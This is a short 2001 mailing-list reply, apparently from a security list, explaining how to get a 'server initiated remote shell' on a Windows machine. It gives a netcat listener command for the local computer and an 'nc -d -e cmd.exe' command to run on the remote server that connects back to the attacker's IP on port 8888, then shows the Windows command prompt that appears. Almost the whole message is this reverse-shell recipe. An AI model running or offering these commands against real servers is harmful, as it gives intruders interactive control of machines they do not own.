Re: Server initiated remote shell

From: Mike Brentlinger (mdbrentlingerat_private)
Date: Fri Sep 21 2001 - 13:54:35 PDT

    sending a shell back to yourself.

    On your local computer run netcat in listen mode.
    nc -l -p 8888

    execute netcat on remote server such that it sends a connection back to you.

    nc -d -e cmd.exe X.X.X.X 8888 (X.X.X.X is your IP)

    The netcat listener you setup should display something
    like this:
            Microsoft Windows [Version xxxx]
            (C) Copyright 1985-2000 Microsoft Corp.
            c:\>